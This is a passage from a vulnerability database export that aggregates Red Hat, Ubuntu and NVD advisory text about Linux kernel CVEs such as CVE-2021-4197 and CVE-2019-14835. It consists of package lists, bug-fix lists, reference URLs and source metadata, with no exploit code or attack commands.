the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. Bugs fixed (https://bugzilla.redhat.com/):\n\n1903244 - CVE-2020-29368 kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check\n2035652 - CVE-2021-4197 kernel: cgroup: Use open-time creds and namespace for migration perm checks\n2036934 - CVE-2021-4203 kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses\n2064604 - CVE-2022-1012 kernel: Small table perturb size in the TCP source port generation algorithm can lead to information leak\n2086753 - CVE-2022-1729 kernel: race condition in perf_event_open leads to privilege escalation\n2092427 - CVE-2022-32250 kernel: a use-after-free write in the netfilter subsystem can lead to privilege escalation to root\n\n6. 
Package List:\n\nRed Hat Enterprise Linux Real Time for NFV EUS (v.8.4):\n\nSource:\nkernel-rt-4.18.0-305.57.1.rt7.129.el8_4.src.rpm\n\nx86_64:\nkernel-rt-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-core-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debug-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debug-core-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debug-debuginfo-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debug-devel-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debug-kvm-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debug-modules-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debug-modules-extra-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debuginfo-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debuginfo-common-x86_64-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-devel-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-kvm-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-modules-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-modules-extra-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\n\nRed Hat Enterprise Linux Real Time EUS 
(v.8.4):\n\nSource:\nkernel-rt-4.18.0-305.57.1.rt7.129.el8_4.src.rpm\n\nx86_64:\nkernel-rt-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-core-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debug-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debug-core-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debug-debuginfo-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debug-devel-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debug-modules-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debug-modules-extra-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debuginfo-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debuginfo-common-x86_64-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-devel-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-modules-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-modules-extra-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Summary:\n\nThe Migration Toolkit for Containers (MTC) 1.7.2 is now available. Description:\n\nThe Migration Toolkit for Containers (MTC) enables you to migrate\nKubernetes resources, persistent volume data, and internal container images\nbetween OpenShift Container Platform clusters, using the MTC web console or\nthe Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):\n\n2007557 - CVE-2021-3807 nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes\n2038898 - [UI] ?Update Repository? option not getting disabled after adding the Replication Repository details to the MTC web console\n2040693 - ?Replication repository? wizard has no validation for name length\n2040695 - [MTC UI] ?Add Cluster? 
wizard stucks when the cluster name length is more than 63 characters\n2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor\n2048537 - Exposed route host to image registry? connecting successfully to invalid registry ?xyz.com?\n2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak\n2055658 - [MTC UI] Cancel button on ?Migrations? page does not disappear when migration gets Failed/Succeeded with warnings\n2056962 - [MTC UI] UI shows the wrong migration type info after changing the target namespace\n2058172 - [MTC UI] Successful Rollback is not showing the green success icon in the ?Last State? field. \n2058529 - [MTC UI] Migrations Plan is missing the type for the state migration performed before upgrade\n2061335 - [MTC UI] ?Update cluster? button is not getting disabled\n2062266 - MTC UI does not display logs properly [OADP-BL]\n2062862 - [MTC UI] Clusters page behaving unexpectedly on deleting the remote cluster?s service account secret from backend\n2074675 - HPAs of DeploymentConfigs are not being updated when migration from Openshift 3.x to Openshift 4.x\n2076593 - Velero pod log missing from UI drop down\n2076599 - Velero pod log missing from downloaded logs folder [OADP-BL]\n2078459 - [MTC UI] Storageclass conversion plan is adding migstorage reference in migplan\n2079252 - [MTC] Rsync options logs not visible in log-reader pod\n2082221 - Don\u0027t allow Storage class conversion migration if source cluster has only one storage class defined [UI]\n2082225 - non-numeric user when launching stage pods [OADP-BL]\n2088022 - Default CPU requests on Velero/Restic are too demanding making scheduling fail in certain environments\n2088026 - Cloud propagation phase in migration controller is not doing anything due to missing labels on Velero pods\n2089126 - [MTC] Migration controller cannot find Velero Pod because of wrong labels\n2089411 - [MTC] Log reader pod is missing 
velero and restic pod logs [OADP-BL]\n2089859 - [Crane] DPA CR is missing the required flag - Migration is getting failed at the EnsureCloudSecretPropagated phase due to the missing secret VolumeMounts\n2090317 - [MTC] mig-operator failed to create a DPA CR due to null values are passed instead of int [OADP-BL]\n2096939 - Fix legacy operator.yml inconsistencies and errors\n2100486 - [MTC UI] Target storage class field is not getting respected when clusters don\u0027t have replication repo configured",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-4197"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-019487"
},
{
"db": "VULHUB",
"id": "VHN-410862"
},
{
"db": "PACKETSTORM",
"id": "169305"
},
{
"db": "PACKETSTORM",
"id": "167746"
},
{
"db": "PACKETSTORM",
"id": "167330"
},
{
"db": "PACKETSTORM",
"id": "168019"
},
{
"db": "PACKETSTORM",
"id": "167886"
},
{
"db": "PACKETSTORM",
"id": "167822"
},
{
"db": "PACKETSTORM",
"id": "167694"
},
{
"db": "PACKETSTORM",
"id": "167679"
}
],
"trust": 2.43
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-410862",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-410862"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2021-4197",
"trust": 3.5
},
{
"db": "JVNDB",
"id": "JVNDB-2021-019487",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "167694",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "167746",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "168019",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "167822",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "167886",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "167443",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168136",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166392",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167097",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167952",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167748",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167714",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167852",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167072",
"trust": 0.1
},
{
"db": "CNNVD",
"id": "CNNVD-202201-1396",
"trust": 0.1
},
{
"db": "CNVD",
"id": "CNVD-2022-68560",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-410862",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169305",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167330",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167679",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-410862"
},
{
"db": "PACKETSTORM",
"id": "169305"
},
{
"db": "PACKETSTORM",
"id": "167746"
},
{
"db": "PACKETSTORM",
"id": "167330"
},
{
"db": "PACKETSTORM",
"id": "168019"
},
{
"db": "PACKETSTORM",
"id": "167886"
},
{
"db": "PACKETSTORM",
"id": "167822"
},
{
"db": "PACKETSTORM",
"id": "167694"
},
{
"db": "PACKETSTORM",
"id": "167679"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-019487"
},
{
"db": "NVD",
"id": "CVE-2021-4197"
}
]
},
"id": "VAR-202201-0496",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-410862"
}
],
"trust": 0.725
},
"last_update_date": "2026-03-09T20:52:51.837000Z",
"patch": {
"_id": null,
"data": [
{
"title": "NTAP-20220602-0006 Oracle Oracle\u00a0Critical\u00a0Patch\u00a0Update",
"trust": 0.8,
"url": "https://www.broadcom.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-019487"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-287",
"trust": 1.1
},
{
"problemtype": "Inappropriate authentication (CWE-287) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-410862"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-019487"
},
{
"db": "NVD",
"id": "CVE-2021-4197"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.9,
"url": "https://www.debian.org/security/2022/dsa-5127"
},
{
"trust": 1.9,
"url": "https://www.debian.org/security/2022/dsa-5173"
},
{
"trust": 1.9,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2035652"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4197"
},
{
"trust": 1.1,
"url": "https://security.netapp.com/advisory/ntap-20220602-0006/"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"trust": 1.0,
"url": "https://lore.kernel.org/lkml/20211209214707.805617-1-tj%40kernel.org/t/"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1353"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.4,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.4,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-4197"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-4203"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1199"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1198"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1205"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1516"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1204"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3752"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1679"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1419"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1652"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1734"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4202"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3752"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-4157"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3744"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-13974"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-41617"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-45485"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3773"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-4002"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-29154"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-43976"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-0941"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-43389"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3634"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27820"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-4189"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-44733"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1271"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-21781"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3634"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-19131"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-4037"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-29154"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1154"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-37159"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-4788"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3772"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-0404"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3669"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3764"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-20322"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-43056"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3612"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-41864"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25032"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-0941"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-35492"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3612"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35492"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-26401"
},
{
"trust": 0.2,
"url": "https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-27820"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3807"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3743"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3737"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1011"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13974"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20322"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-4083"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-45486"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0322"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-4788"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-26401"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0286"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0001"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3759"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-21781"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0002"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-25032"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-19131"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-42739"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-0404"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1729"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-32250"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4203"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1729"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1012"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-29368"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1012"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32250"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29368"
},
{
"trust": 0.1,
"url": "https://lore.kernel.org/lkml/20211209214707.805617-1-tj@kernel.org/t/"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27666"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26490"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1158"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1016"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1195"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1048"
},
{
"trust": 0.1,
"url": "https://security-tracker.debian.org/tracker/linux"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0168"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3760"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-39714"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0330"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21123"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-39685"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3609"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5513-1"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:4814"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3669"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-39293"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3772"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3773"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3743"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3764"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-37159"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3737"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3759"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-39293"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4002"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3744"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3807"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-34169"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21540"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.9/updating/updating-cluster-cli.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21540"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21541"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-34169"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21541"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2403"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhba-2022:5878"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2403"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:5879"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2380"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1011"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-28388"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-28389"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5541-1"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:5633"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-28356"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5500-1"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0536"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0235"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26691"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:5483"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23852"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-410862"
},
{
"db": "PACKETSTORM",
"id": "169305"
},
{
"db": "PACKETSTORM",
"id": "167746"
},
{
"db": "PACKETSTORM",
"id": "167330"
},
{
"db": "PACKETSTORM",
"id": "168019"
},
{
"db": "PACKETSTORM",
"id": "167886"
},
{
"db": "PACKETSTORM",
"id": "167822"
},
{
"db": "PACKETSTORM",
"id": "167694"
},
{
"db": "PACKETSTORM",
"id": "167679"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-019487"
},
{
"db": "NVD",
"id": "CVE-2021-4197"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-410862",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169305",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167746",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167330",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168019",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167886",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167822",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167694",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167679",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2021-019487",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2021-4197",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2022-03-23T00:00:00",
"db": "VULHUB",
"id": "VHN-410862",
"ident": null
},
{
"date": "2022-05-28T19:12:00",
"db": "PACKETSTORM",
"id": "169305",
"ident": null
},
{
"date": "2022-07-14T14:32:14",
"db": "PACKETSTORM",
"id": "167746",
"ident": null
},
{
"date": "2022-05-31T17:24:53",
"db": "PACKETSTORM",
"id": "167330",
"ident": null
},
{
"date": "2022-08-10T15:50:18",
"db": "PACKETSTORM",
"id": "168019",
"ident": null
},
{
"date": "2022-07-29T14:39:49",
"db": "PACKETSTORM",
"id": "167886",
"ident": null
},
{
"date": "2022-07-27T17:20:56",
"db": "PACKETSTORM",
"id": "167822",
"ident": null
},
{
"date": "2022-07-04T14:32:13",
"db": "PACKETSTORM",
"id": "167694",
"ident": null
},
{
"date": "2022-07-01T15:04:32",
"db": "PACKETSTORM",
"id": "167679",
"ident": null
},
{
"date": "2023-08-02T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-019487",
"ident": null
},
{
"date": "2022-03-23T20:15:10.200000",
"db": "NVD",
"id": "CVE-2021-4197",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-02-03T00:00:00",
"db": "VULHUB",
"id": "VHN-410862",
"ident": null
},
{
"date": "2023-08-02T06:47:00",
"db": "JVNDB",
"id": "JVNDB-2021-019487",
"ident": null
},
{
"date": "2024-11-21T06:37:07.517000",
"db": "NVD",
"id": "CVE-2021-4197",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "local",
"sources": [
{
"db": "PACKETSTORM",
"id": "167746"
},
{
"db": "PACKETSTORM",
"id": "167886"
},
{
"db": "PACKETSTORM",
"id": "167694"
}
],
"trust": 0.3
},
"title": {
"_id": null,
"data": "Linux\u00a0Kernel\u00a0 Authentication vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-019487"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "arbitrary",
"sources": [
{
"db": "PACKETSTORM",
"id": "167746"
},
{
"db": "PACKETSTORM",
"id": "167886"
},
{
"db": "PACKETSTORM",
"id": "167694"
}
],
"trust": 0.3
}
}
VAR-201909-0695
Vulnerability from variot - Updated: 2026-03-09 20:38
A buffer overflow flaw was found, in versions from 2.6.34 to 5.2.x, in the way the Linux kernel's vhost functionality, which translates virtqueue buffers to IOVs, logged the buffer descriptors during migration. A privileged guest user able to pass descriptors with an invalid length to the host while migration is underway could use this flaw to escalate their privileges on the host (CVE-2019-14835). The vulnerability stems from incorrect verification of data boundaries during memory operations, resulting in reads and writes to other associated memory locations; attackers can exploit it to cause a buffer or heap overflow.
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

==========================================================================
Kernel Live Patch Security Notice 0058-1
October 22, 2019
linux vulnerability
A security issue affects these releases of Ubuntu:
| Series           | Base kernel  | Arch     | flavors          |
|------------------+--------------+----------+------------------|
| Ubuntu 18.04 LTS | 4.15.0       | amd64    | aws              |
| Ubuntu 18.04 LTS | 4.15.0       | amd64    | generic          |
| Ubuntu 18.04 LTS | 4.15.0       | amd64    | lowlatency       |
| Ubuntu 18.04 LTS | 4.15.0       | amd64    | oem              |
| Ubuntu 18.04 LTS | 5.0.0        | amd64    | azure            |
| Ubuntu 14.04 LTS | 4.4.0        | amd64    | generic          |
| Ubuntu 14.04 LTS | 4.4.0        | amd64    | lowlatency       |
| Ubuntu 16.04 LTS | 4.4.0        | amd64    | aws              |
| Ubuntu 16.04 LTS | 4.4.0        | amd64    | generic          |
| Ubuntu 16.04 LTS | 4.4.0        | amd64    | lowlatency       |
| Ubuntu 16.04 LTS | 4.15.0       | amd64    | azure            |
| Ubuntu 16.04 LTS | 4.15.0       | amd64    | generic          |
| Ubuntu 16.04 LTS | 4.15.0       | amd64    | lowlatency       |
Summary:
Several security issues were fixed in the kernel.
Software Description: - linux: Linux kernel
Details:
It was discovered that a race condition existed in the GFS2 file system in the Linux kernel. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2016-10905)
It was discovered that a use-after-free error existed in the block layer subsystem of the Linux kernel when certain failure conditions occurred. A local attacker could possibly use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-20856)
